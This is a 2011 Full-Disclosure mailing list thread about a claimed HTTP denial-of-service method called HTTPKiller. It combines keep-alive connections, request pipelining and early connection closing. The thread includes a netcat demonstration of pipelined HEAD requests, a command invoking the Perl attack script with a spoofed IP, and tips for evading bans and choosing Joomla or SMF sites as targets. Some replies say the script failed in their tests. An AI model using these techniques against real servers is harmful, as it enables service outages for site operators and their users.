[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] HTTPKiller - (Global HTTP DoS)



This attack amplifies the server load so you need to create a significant
load on the server.
When we send a HEAD request to the server, it processes the PHP to generate
headers.
What happens when we do 2 Requests for an apache server using pipelining?

<?php
sleep(2);
?>

linux-7nli:/home/xianur0 # netcat -vvv localhost 8080
localhost [127.0.0.1] 8080 (http-alt) open
HEAD /sleep.php HTTP/1.1
Host: localhost:8080

HEAD /sleep.php HTTP/1.1
Host: localhost:8080

[4 sec. later]
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2011 03:49:50 GMT
Server: Apache/2.2.17 (Linux/SUSE)
X-Powered-By: PHP/5.3.5
Content-Type: text/html

HTTP/1.1 200 OK
Date: Fri, 26 Aug 2011 03:49:52 GMT
Server: Apache/2.2.17 (Linux/SUSE)
X-Powered-By: PHP/5.3.5
Content-Type: text/html

What happens here is that it creates a "waiting list", so until this is
finished processing, it will give us the answer.
If we cut the connection before the end...

What is a CLIENT-IP or X-Forwarded-For for Joomla! or SMF? a lot of SQL
queries (load).

If we send many more queries using keep-alive connections... besides the
load remains on the server until the end, it creates more threads.
This attack is not "slowloris" or "apachekiller".

Ban? Try this:
http://[domain]/[file]?{mn-fakeip}

Not very smart... but it could work xD
Or use fewer connections.
Try against a Joomla! or SMF (Not a simple html).

2011/8/25 Ulises2k <ulises2k@xxxxxxxxx>

> I have tried with Apache 2.2.9 and a simple file php and does not
> cause DoS Apache Server.
>
>
>
> On Thu, Aug 25, 2011 at 19:21, Xianuro GL <xianur0.null@xxxxxxxxx> wrote:
> >
> > linux-7nli:/home/xianur0/fhttp-v1.3/DoS # perl mn.pl http://[domain]/[file]
> 30 100 190.1.1.1
> >
> > Where "file" have to consume processing in the server (i.e. index.php for
> Joomla! CMS).
> >
> > Remember the "http://"; :P
> >
> > 2011/8/25 -= Glowing Sex =- <doomxd@xxxxxxxxx>
> >>
> >> Ummm ok, lets see, i tried to use this, it keeps giving me 'usage' abit
> to much :P , even when i have read thru the code and seen an example/would
> make example.... but seems it is not being nice, unless i have perhaps made
> the error.. or it is not pasted in correctly,... i will try again but, i
> sofar see no threat here, because it doesnt work to well, to start with...
> btw, it looks alot like a slowloris like attack, wich would be blocked by
> most servers... still, please show me some examples.. this is NOT a
> happening script atm!
> >> and also, maybe adjust encoding, so when copy and paste, it doesnt bork
> up.. incase it is maybe that.... altho, it seems to exec fine... i am using
> perl script.pl blah.com 10 10 ip.fake.here.ofc
> >> nothing but usage...
> >> cheers in advance
> >> xd
> >>
> >>
> >>
> >> On 26 August 2011 06:42, Xianuro GL <xianur0.null@xxxxxxxxx> wrote:
> >>>
> >>> Connection Keep-Alive + Pipelining + Close the connection before the
> response + Something... = DoS
> >>> Apache, IIS, Squid, NetCache, What else?
> >>>
> >>> _______________________________________________
> >>> Full-Disclosure - We believe in it.
> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/